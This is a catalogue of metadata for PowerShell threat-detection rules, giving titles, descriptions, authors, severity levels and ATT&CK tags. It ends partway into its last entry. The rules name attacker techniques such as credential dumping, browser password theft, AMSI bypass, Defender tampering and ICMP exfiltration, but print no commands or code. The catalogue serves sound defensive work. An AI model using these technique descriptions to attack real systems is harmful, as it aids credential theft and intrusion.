UUID 602f5669-6927-4688-84db-0d4b7afb2150 which can be used as unique global reference for Disable Powershell Command History in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2022/08/21
falsepositive ['Legitimate script that disables the command history']
filename posh_ps_disable_psreadline_command_history.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Powershell Keylogging

Adversaries may log user keystrokes to intercept credentials as the user types them.

Internal MISP references

UUID 34f90d3c-c297-49e9-b26d-911b05a4866c which can be used as unique global reference for Powershell Keylogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/30
falsepositive ['Unknown']
filename posh_ps_keylogging.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1056.001']
Related clusters

To see the related clusters, click here.

Access to Browser Login Data

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Internal MISP references

UUID fc028194-969d-4122-8abe-0470d5b8f12f which can be used as unique global reference for Access to Browser Login Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/30
falsepositive ['Unknown']
filename posh_ps_access_to_browser_login_data.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Mailbox Export to Share - PS

Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations

Internal MISP references

UUID 4a241dea-235b-4a7e-8d76-50d817b146c4 which can be used as unique global reference for Suspicious PowerShell Mailbox Export to Share - PS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Unknown']
filename posh_ps_mailboxexport_share.yml
level critical
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration']

Import PowerShell Modules From Suspicious Directories

Detects powershell scripts that import modules from suspicious directories

Internal MISP references

UUID 21f9162c-5f5d-4b01-89a8-b705bd7d10ab which can be used as unique global reference for Import PowerShell Modules From Suspicious Directories in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/07
falsepositive ['Unknown']
filename posh_ps_import_module_susp_dirs.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powershell Sensitive File Discovery

Detect adversaries enumerate sensitive files

Internal MISP references

UUID 7d416556-6502-45b2-9bad-9d2f05f38997 which can be used as unique global reference for Powershell Sensitive File Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/16
falsepositive ['Unknown']
filename posh_ps_sensitive_file_discovery.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

PowerShell Script With File Hostname Resolving Capabilities

Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.

Internal MISP references

UUID fbc5e92f-3044-4e73-a5c6-1c4359b539de which can be used as unique global reference for PowerShell Script With File Hostname Resolving Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['The same functionality can be implemented by admin scripts, correlate with name and creator']
filename posh_ps_resolve_list_of_ip_from_file.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1020']
Related clusters

To see the related clusters, click here.

Dump Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

Internal MISP references

UUID 99c49d9c-34ea-45f7-84a7-4751ae6b2cbc which can be used as unique global reference for Dump Credentials from Windows Credential Manager With PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename posh_ps_dump_password_windows_credential_manager.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1555']
Related clusters

To see the related clusters, click here.

Suspicious SSL Connection

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

Internal MISP references

UUID 195626f3-5f1b-4403-93b7-e6cfd4d6a078 which can be used as unique global reference for Suspicious SSL Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Legitimate administrative script']
filename posh_ps_susp_ssl_keyword.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1573']
Related clusters

To see the related clusters, click here.

Potential In-Memory Execution Using Reflection.Assembly

Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory

Internal MISP references

UUID ddcd88cb-7f62-4ce5-86f9-1704190feb0a which can be used as unique global reference for Potential In-Memory Execution Using Reflection.Assembly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Legitimate use of the library']
filename posh_ps_dotnet_assembly_from_file.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1620']
Related clusters

To see the related clusters, click here.

HackTool - WinPwn Execution - ScriptBlock

Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

Internal MISP references

UUID 851fd622-b675-4d26-b803-14bc7baa517a which can be used as unique global reference for HackTool - WinPwn Execution - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/12/04
falsepositive ['As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection.']
filename posh_ps_hktl_winpwn.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.discovery', 'attack.execution', 'attack.privilege_escalation', 'attack.t1046', 'attack.t1082', 'attack.t1106', 'attack.t1518', 'attack.t1548.002', 'attack.t1552.001', 'attack.t1555', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Suspicious Get-ADReplAccount

The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

Internal MISP references

UUID 060c3ef1-fd0a-4091-bf46-e7d625f60b73 which can be used as unique global reference for Suspicious Get-ADReplAccount in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/06
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_get_adreplaccount.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

Disable of ETW Trace - Powershell

Detects usage of powershell cmdlets to disable or remove ETW trace sessions

Internal MISP references

UUID 115fdba9-f017-42e6-84cf-d5573bf2ddf8 which can be used as unique global reference for Disable of ETW Trace - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename posh_ps_etw_trace_evasion.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562.006', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Change PowerShell Policies to an Insecure Level - PowerShell

Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.

Internal MISP references

UUID 61d0475c-173f-4844-86f7-f3eebae1c66b which can be used as unique global reference for Change PowerShell Policies to an Insecure Level - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/10/20
falsepositive ['Administrator script']
filename posh_ps_set_policies_to_unsecure_level.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

DirectorySearcher Powershell Exploitation

Enumerates Active Directory to determine computers that are joined to the domain

Internal MISP references

UUID 1f6399cf-2c80-4924-ace1-6fcff3393480 which can be used as unique global reference for DirectorySearcher Powershell Exploitation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/12
falsepositive ['Unknown']
filename posh_ps_directorysearcher.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Suspicious Unblock-File

Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.

Internal MISP references

UUID 5947497f-1aa4-41dd-9693-c9848d58727d which can be used as unique global reference for Suspicious Unblock-File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/01
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_unblock_file.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.005']
Related clusters

To see the related clusters, click here.

Powershell Suspicious Win32_PnPEntity

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.

Internal MISP references

UUID b26647de-4feb-4283-af6b-6117661283c5 which can be used as unique global reference for Powershell Suspicious Win32_PnPEntity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/23
falsepositive ['Admin script']
filename posh_ps_susp_win32_pnpentity.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1120']
Related clusters

To see the related clusters, click here.

Enumerate Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

Internal MISP references

UUID 603c6630-5225-49c1-8047-26c964553e0e which can be used as unique global reference for Enumerate Credentials from Windows Credential Manager With PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename posh_ps_enumerate_password_windows_credential_manager.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1555']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - PowerShell

Detects Obfuscated Powershell via use Rundll32 in Scripts

Internal MISP references

UUID a5a30a6e-75ca-4233-8b8c-42e0f2037d3b which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2019/10/08
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_use_rundll32.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging

Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet

Internal MISP references

UUID ae2bdd58-0681-48ac-be7f-58ab4e593458 which can be used as unique global reference for Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_tamper_windows_defender_rem_mp.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Powershell Execute Batch Script

Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system

Internal MISP references

UUID b5522a23-82da-44e5-9c8b-e10ed8955f88 which can be used as unique global reference for Powershell Execute Batch Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/02
falsepositive ['Legitimate administration script']
filename posh_ps_susp_execute_batch_script.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014

Internal MISP references

UUID 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_obfuscated_iex.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript

Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages

Internal MISP references

UUID 975b2262-9a49-439d-92a6-0709cccdf0b2 which can be used as unique global reference for Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/31
falsepositive ['Installation of unsigned packages for testing purposes']
filename posh_ps_install_unsigned_appx_packages.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

Modify Group Policy Settings - ScriptBlockLogging

Detect malicious GPO modifications can be used to implement many other malicious behaviors.

Internal MISP references

UUID b7216a7d-687e-4c8d-82b1-3080b2ad961f which can be used as unique global reference for Modify Group Policy Settings - ScriptBlockLogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Legitimate use']
filename posh_ps_modify_group_policy_settings.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1484.001']
Related clusters

To see the related clusters, click here.

Powershell Store File In Alternate Data Stream

Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.

Internal MISP references

UUID a699b30e-d010-46c8-bbd1-ee2e26765fe9 which can be used as unique global reference for Powershell Store File In Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/09/02
falsepositive ['Unknown']
filename posh_ps_store_file_in_alternate_data_stream.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Windows Screen Capture with CopyFromScreen

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations

Internal MISP references

UUID d4a11f63-2390-411c-9adf-d791fd152830 which can be used as unique global reference for Windows Screen Capture with CopyFromScreen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_capture_screenshots.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Download - Powershell Script

Detects suspicious PowerShell download command

Internal MISP references

UUID 403c2cc0-7f6b-4925-9423-bfa573bed7eb which can be used as unique global reference for Suspicious PowerShell Download - Powershell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['PowerShell scripts that download content from the Internet']
filename posh_ps_susp_download.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Credential Prompt

Detects PowerShell calling a credential prompt

Internal MISP references

UUID ca8b77a9-d499-4095-b793-5d5f330d450e which can be used as unique global reference for PowerShell Credential Prompt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author John Lambert (idea), Florian Roth (Nextron Systems)
creation_date 2017/04/09
falsepositive ['Unknown']
filename posh_ps_prompt_credentials.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Execute Invoke-command on Remote Host

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 7b836d7f-179c-4ba4-90a7-a7e60afb48e6 which can be used as unique global reference for Execute Invoke-command on Remote Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Legitimate script']
filename posh_ps_invoke_command_remote.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

Powershell Add Name Resolution Policy Table Rule

Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.

Internal MISP references

UUID 4368354e-1797-463c-bc39-a309effbe8d7 which can be used as unique global reference for Powershell Add Name Resolution Policy Table Rule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Borna Talebi
creation_date 2021/09/14
falsepositive ['Unknown']
filename posh_ps_add_dnsclient_rule.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1565']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Keywords

Detects keywords from well-known PowerShell exploitation frameworks

Internal MISP references

UUID f62176f3-8128-4faa-bf6c-83261322e5eb which can be used as unique global reference for Malicious PowerShell Keywords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf (source), Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['Depending on the scripts, this rule might require some initial tuning to fit the environment']
filename posh_ps_malicious_keywords.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Set-Acl On Windows Folder - PsScript

Detects PowerShell scripts to set the ACL to a file in the Windows folder

Internal MISP references

UUID 3bf1d859-3a7e-44cb-8809-a99e066d3478 which can be used as unique global reference for PowerShell Set-Acl On Windows Folder - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename posh_ps_set_acl_susp_location.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - PowerShell

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID 0adfbc14-0ed1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_var.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Internal MISP references

UUID 88f0884b-331d-403d-a3a1-b668cf035603 which can be used as unique global reference for AD Groups Or Users Enumeration Using PowerShell - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Unknown']
filename posh_ps_susp_ad_group_reco.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

PowerShell Write-EventLog Usage

Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use

Internal MISP references

UUID 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e which can be used as unique global reference for PowerShell Write-EventLog Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/16
falsepositive ['Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign']
filename posh_ps_susp_write_eventlog.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion']

Potential Active Directory Enumeration Using AD Module - PsScript

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.

Internal MISP references

UUID 9e620995-f2d8-4630-8430-4afd89f77604 which can be used as unique global reference for Potential Active Directory Enumeration Using AD Module - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2023/01/22
falsepositive ['Legitimate use of the library for administrative activity']
filename posh_ps_active_directory_module_dll_import.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.reconnaissance', 'attack.discovery', 'attack.impact']

PowerShell ADRecon Execution

Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7

Internal MISP references

UUID bf72941a-cba0-41ea-b18c-9aca3925690d which can be used as unique global reference for PowerShell ADRecon Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/07/16
falsepositive ['Unknown']
filename posh_ps_adrecon_execution.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious GPO Discovery With Get-GPO

Detect use of Get-GPO to get one GPO or all the GPOs in a domain.

Internal MISP references

UUID eb2fd349-ec67-4caa-9143-d79c7fb34441 which can be used as unique global reference for Suspicious GPO Discovery With Get-GPO in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/04
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_gpo.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1615']
Related clusters

To see the related clusters, click here.

Disable-WindowsOptionalFeature Command PowerShell

Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Internal MISP references

UUID 99c4658d-2c5e-4d87-828d-7c066ca537c3 which can be used as unique global reference for Disable-WindowsOptionalFeature Command PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/10
falsepositive ['Unknown']
filename posh_ps_disable_windows_optional_feature.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Powershell LocalAccount Manipulation

Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups

Internal MISP references

UUID 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c which can be used as unique global reference for Powershell LocalAccount Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Legitimate administrative script']
filename posh_ps_localuser.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

PowerShell ICMP Exfiltration

Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Internal MISP references

UUID 4c4af3cd-2115-479c-8193-6b8bfce9001c which can be used as unique global reference for PowerShell ICMP Exfiltration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz @bczyz1, oscd.community
creation_date 2020/10/10
falsepositive ['Legitimate usage of System.Net.NetworkInformation.Ping class']
filename posh_ps_icmp_exfiltration.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Silence.EDA Detection

Detects Silence EmpireDNSAgent as described in the Group-IP report

Internal MISP references

UUID 3ceb2083-a27f-449a-be33-14ec1b7cc973 which can be used as unique global reference for Silence.EDA Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alina Stepchenkova, Group-IB, oscd.community
creation_date 2019/11/01
falsepositive ['Unknown']
filename posh_ps_apt_silence_eda.yml
level critical
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.command_and_control', 'attack.t1071.004', 'attack.t1572', 'attack.impact', 'attack.t1529', 'attack.g0091', 'attack.s0363']
Related clusters

To see the related clusters, click here.

Testing Usage of Uncommonly Used Port

Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.

Internal MISP references

UUID adf876b3-f1f8-4aa9-a4e4-a64106feec06 which can be used as unique global reference for Testing Usage of Uncommonly Used Port in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Legitimate administrative script']
filename posh_ps_test_netconnection.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1571']
Related clusters

To see the related clusters, click here.

PowerShell Hotfix Enumeration

Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers

Internal MISP references

UUID f5d1def8-1de0-4a0e-9794-1f6f27dd605c which can be used as unique global reference for PowerShell Hotfix Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/21
falsepositive ['Legitimate administration scripts']
filename posh_ps_hotfix_enum.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery']

Replace Desktop Wallpaper by Powershell

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper

Internal MISP references

UUID c5ac6a1e-9407-45f5-a0ce-ca9a0806a287 which can be used as unique global reference for Replace Desktop Wallpaper by Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename posh_ps_susp_wallpaper.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Potential WinAPI Calls Via PowerShell Scripts

Detects use of WinAPI functions in PowerShell scripts

Internal MISP references

UUID 03d83090-8cba-44a0-b02f-0b756a050306 which can be used as unique global reference for Potential WinAPI Calls Via PowerShell Scripts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community
creation_date 2020/10/06
falsepositive ['Unknown']
filename posh_ps_win_api_susp_access.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1106']
Related clusters

To see the related clusters, click here.

Potential AMSI Bypass Script Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

Internal MISP references

UUID fa2559c8-1197-471d-9cdd-05a0273d4522 which can be used as unique global reference for Potential AMSI Bypass Script Using NULL Bits in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename posh_ps_amsi_null_bits_bypass.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Live Memory Dump Using Powershell

Detects usage of a PowerShell command to dump the live memory of a Windows machine

Internal MISP references

UUID cd185561-4760-45d6-a63e-a51325112cae which can be used as unique global reference for Live Memory Dump Using Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/09/21
falsepositive ['Diagnostics']
filename posh_ps_memorydump_getstoragediagnosticinfo.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.t1003']
Related clusters

To see the related clusters, click here.

AADInternals PowerShell Cmdlets Execution - PsScript

Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.

Internal MISP references

UUID 91e69562-2426-42ce-a647-711b8152ced6 which can be used as unique global reference for AADInternals PowerShell Cmdlets Execution - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Legitimate use of the library for administrative activity']
filename posh_ps_aadinternals_cmdlets_execution.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.reconnaissance', 'attack.discovery', 'attack.credential_access', 'attack.impact']

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

Detects Obfuscated Powershell via RUNDLL LAUNCHER
